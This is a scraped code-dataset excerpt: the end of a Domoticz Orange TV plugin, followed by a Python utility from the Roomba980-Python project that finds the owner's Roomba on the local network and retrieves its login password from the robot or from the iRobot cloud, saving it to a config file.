def onHeartbeat(self):
if 1 in Devices and self.OrangeTVConn.Connected():
self.OrangeTVConn.Send(
{'Verb': 'GET', 'URL': '/remoteControl/cmd?operation=10'})
def onStatusUpdated(self, status):
Domoticz.Debug(f"onStatusUpdated: status={str(status)}")
if 1 in Devices:
self.context = ContextFactory().create(self.OrangeTVConn, status)
Devices[1].Update(self.context.state, self.context.text)
# Domoticz Python Plugin Interface
global _plugin
_plugin = Plugin()
def onStart():
global _plugin
_plugin.onStart()
def onConnect(Connection, Status, Description):
global _plugin
_plugin.onConnect(Connection, Status, Description)
def onDisconnect(Connection):
global _plugin
_plugin.onDisconnect(Connection)
def onMessage(Connection, Data):
global _plugin
_plugin.onMessage(Connection, Data)
def onCommand(Unit, Command, Level, Color):
global _plugin
_plugin.onCommand(Unit, Command, Level, Color)
def onHeartbeat():
global _plugin
_plugin.onHeartbeat()
``` |
{
"source": "JimmyTournemaine/Roomba980-Python",
"score": 3
} |
#### File: Roomba980-Python/roomba/password.py
```python
__version__ = "2.0a"
'''
Python 3.6
Quick Program to get blid and password from roomba
<NAME> 5th May 2017: V 1.0: Initial Release
<NAME> 22nd Dec 2020: V2.0: Updated for i and S Roomba versions, update to minimum python version 3.6
'''
from pprint import pformat
import json
import logging
import socket
import ssl
import sys
import time
from ast import literal_eval
import configparser
class Password(object):
'''
Get Roomba blid and password - only V2 firmware supported
if IP is not supplied, class will attempt to discover the Roomba IP first.
Results are written to a config file, default ".\config.ini"
V 1.2.3 NW 9/10/2018 added support for Roomba i7
V 1.2.5 NW 7/10/2019 changed PROTOCOL_TLSv1 to PROTOCOL_TLS to fix i7 software connection problem
V 1.2.6 NW 12/11/2019 add cipher to ssl to avoid dh_key_too_small issue
V 2.0 NW 22nd Dec 2020 updated for S and i versions plus braava jet m6, min version of python 3.6
V 2.1 NW 9th Dec 2021 Added getting password from aws cloud.
'''
VERSION = __version__ = "2.1"
config_dicts = ['data', 'mapsize', 'pmaps', 'regions']
def __init__(self, address='255.255.255.255', file=".\config.ini", login=[]):
self.address = address
self.file = file
self.login = None
self.password = <PASSWORD>
if len(login) >= 2:
self.login = login[0]
self.password = login[1]
self.log = logging.getLogger('Roomba.{}'.format(__class__.__name__))
self.log.info("Using Password version {}".format(self.__version__))
def read_config_file(self):
#read config file
Config = configparser.ConfigParser()
roombas = {}
try:
Config.read(self.file)
self.log.info("reading/writing info from config file {}".format(self.file))
roombas = {s:{k:literal_eval(v) if k in self.config_dicts else v for k, v in Config.items(s)} for s in Config.sections()}
#self.log.info('data read from {}: {}'.format(self.file, pformat(roombas)))
except Exception as e:
self.log.exception(e)
return roombas
def receive_udp(self):
#set up UDP socket to receive data from robot
port = 5678
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(10)
if self.address == '255.255.255.255':
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.bind(("", port)) #bind all interfaces to port
self.log.info("waiting on port: {} for data".format(port))
message = 'irobotmcs'
s.sendto(message.encode(), (self.address, port))
roomba_dict = {}
while True:
try:
udp_data, addr = s.recvfrom(1024) #wait for udp data
#self.log.debug('Received: Robot addr: {} Data: {}'.format(addr, udp_data))
if udp_data and udp_data.decode() != message:
try:
#if self.address != addr[0]:
# self.log.warning(
# "supplied address {} does not match "
# "discovered address {}, using discovered "
# "address...".format(self.address, addr[0]))
parsedMsg = json.loads(udp_data.decode())
if addr[0] not in roomba_dict.keys():
s.sendto(message.encode(), (self.address, port))
roomba_dict[addr[0]]=parsedMsg
self.log.info('Robot at IP: {} Data: {}'.format(addr[0], json.dumps(parsedMsg, indent=2)))
except Exception as e:
self.log.info("json decode error: {}".format(e))
self.log.info('RECEIVED: {}'.format(pformat(udp_data)))
except socket.timeout:
break
s.close()
return roomba_dict
def add_cloud_data(self, cloud_data, roombas):
for k, v in roombas.copy().items():
robotid = v.get('robotid', v.get("hostname", "").split('-')[1])
for id, data in cloud_data.items():
if robotid == id:
roombas[k]["password"] = data.get('password')
return roombas
def get_password(self):
#load roombas from config file
file_roombas = self.read_config_file()
cloud_roombas = {}
#get roomba info
roombas = self.receive_udp()
if self.login and self.password:
self.log.info("Getting Roomba information from iRobot aws cloud...")
from getcloudpassword import irobotAuth
iRobot = irobotAuth(self.login, self.password)
iRobot.login()
cloud_roombas = iRobot.get_robots()
self.log.info("Got cloud info: {}".format(json.dumps(cloud_roombas, indent=2)))
self.log.info("Found {} roombas defined in the cloud".format(len(cloud_roombas)))
if len(cloud_roombas) > 0 and len(roombas) > 0:
roombas = self.add_cloud_data(cloud_roombas, roombas)
if len(roombas) == 0:
self.log.warning("No Roombas found on network, try again...")
return False
self.log.info("{} robot(s) already defined in file{}, found {} robot(s) on network".format(len(file_roombas), self.file, len(roombas)))
for addr, parsedMsg in roombas.items():
blid = parsedMsg.get('robotid', parsedMsg.get("hostname", "").split('-')[1])
robotname = parsedMsg.get('robotname', 'unknown')
if int(parsedMsg.get("ver", "3")) < 2:
self.log.info("Roombas at address: {} does not have the correct "
"firmware version. Your version info is: {}".format(addr,json.dumps(parsedMsg, indent=2)))
continue
password = parsedMsg.get('password')
if password is None:
self.log.info("To add/update Your robot details,"
"make sure your robot ({}) at IP {} is on the Home Base and "
"powered on (green lights on). Then press and hold the HOME "
"button on your robot until it plays a series of tones "
"(about 2 seconds). Release the button and your robot will "
"flash WIFI light.".format(robotname, addr))
else:
self.log.info("Configuring robot ({}) at IP {} from cloud data, blid: {}, password: {}".format(robotname, addr, blid, password))
if sys.stdout.isatty():
char = input("Press <Enter> to continue...\r\ns<Enter> to skip configuring this robot: ")
if char == 's':
self.log.info('Skipping')
continue
#self.log.info("Received: %s" % json.dumps(parsedMsg, indent=2))
if password is None:
self.log.info("Roomba ({}) IP address is: {}".format(robotname, addr))
data = self.get_password_from_roomba(addr)
if len(data) <= 7:
self.log.error( 'Error getting password for robot {} at ip{}, received {} bytes. '
'Follow the instructions and try again.'.format(robotname, addr, len(data)))
continue
# Convert password to str
password = str(data[7:].decode().rstrip('\x00')) #for i7 - has null termination
self.log.info("blid is: {}".format(blid))
self.log.info('Password=> {} <= Yes, all this string.'.format(password))
self.log.info('Use these credentials in roomba.py')
file_roombas.setdefault(addr, {})
file_roombas[addr]['blid'] = blid
file_roombas[addr]['password'] = password
file_roombas[addr]['data'] = parsedMsg
return self.save_config_file(file_roombas)
def get_password_from_roomba(self, addr):
'''
Send MQTT magic packet to addr
this is 0xf0 (mqtt reserved) 0x05(data length) 0xefcc3b2900 (data)
Should receive 37 bytes containing the password for roomba at addr
This is is 0xf0 (mqtt RESERVED) length (0x23 = 35) 0xefcc3b2900 (magic packet),
followed by 0xXXXX... (30 bytes of password). so 7 bytes, followed by 30 bytes of password
total of 37 bytes
Uses 10 second timeout for socket connection
'''
data = b''
packet = bytes.fromhex('f005efcc3b2900')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
#context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context = ssl.SSLContext()
#context.set_ciphers('DEFAULT@SECLEVEL=1:HIGH:!DH:!aNULL')
wrappedSocket = context.wrap_socket(sock)
try:
wrappedSocket.connect((addr, 8883))
self.log.debug('Connection Successful')
wrappedSocket.send(packet)
self.log.debug('Waiting for data')
while len(data) < 37:
data_received = wrappedSocket.recv(1024)
data+= data_received
if len(data_received) == 0:
self.log.info("socket closed")
break
wrappedSocket.close()
return data
except socket.timeout as e:
self.log.error('Connection Timeout Error (for {}): {}'.format(addr, e))
except (ConnectionRefusedError, OSError) as e:
if e.errno == 111: #errno.ECONNREFUSED
self.log.error('Unable to Connect to roomba at ip {}, make sure nothing else is connected (app?), '
'as only one connection at a time is allowed'.format(addr))
elif e.errno == 113: #errno.No Route to Host
self.log.error('Unable to contact roomba on ip {} is the ip correct?'.format(addr))
else:
self.log.error("Connection Error (for {}): {}".format(addr, e))
except Exception as e:
self.log.exception(e)
self.log.error('Unable to get password from roomba')
return data
def save_config_file(self, roomba):
Config = configparser.ConfigParser()
if roomba:
for addr, data in roomba.items():
Config.add_section(addr)
for k, v in data.items():
#self.log.info('saving K: {}, V: {}'.format(k, pformat(v) if k in self.config_dicts else v))
Config.set(addr,k, pformat(v) if k in self.config_dicts else v)
# write config file
with open(self.file, 'w') as cfgfile:
Config.write(cfgfile)
self.log.info('Configuration saved to {}'.format(self.file))
else: return False
return True
def get_roombas(self):
roombas = self.read_config_file()
if not roombas:
self.log.warn("No roomba or config file defined, I will attempt to "
"discover Roombas, please put the Roomba on the dock "
"and follow the instructions:")
self.get_password()
return self.get_roombas()
self.log.info("{} Roombas Found".format(len(roombas)))
for ip in roombas.keys():
roombas[ip]["roomba_name"] = roombas[ip]['data']['robotname']
return roombas
def main():
import argparse
loglevel = logging.DEBUG
LOG_FORMAT = "%(asctime)s %(levelname)s [%(name)s] %(message)s"
LOG_DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
logging.basicConfig(format=LOG_FORMAT, datefmt=LOG_DATE_FORMAT, level=loglevel)
#-------- Command Line -----------------
parser = argparse.ArgumentParser(
description='Get Robot passwords and update config file')
parser.add_argument(
'login',
nargs='*',
action='store',
type=str,
default=[],
help='iRobot Account Login and Password (default: None)')
parser.add_argument(
'-f', '--configfile',
action='store',
type=str,
default="./config.ini",
help='config file name, (default: %(default)s)')
parser.add_argument(
'-R','--roombaIP',
action='store',
type=str,
default='255.255.255.255',
help='ipaddress of Roomba (default: %(default)s)')
arg = parser.parse_args()
get_passwd = Password(arg.roombaIP, file=arg.configfile, login=arg.login)
get_passwd.get_password()
if __name__ == '__main__':
main()
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.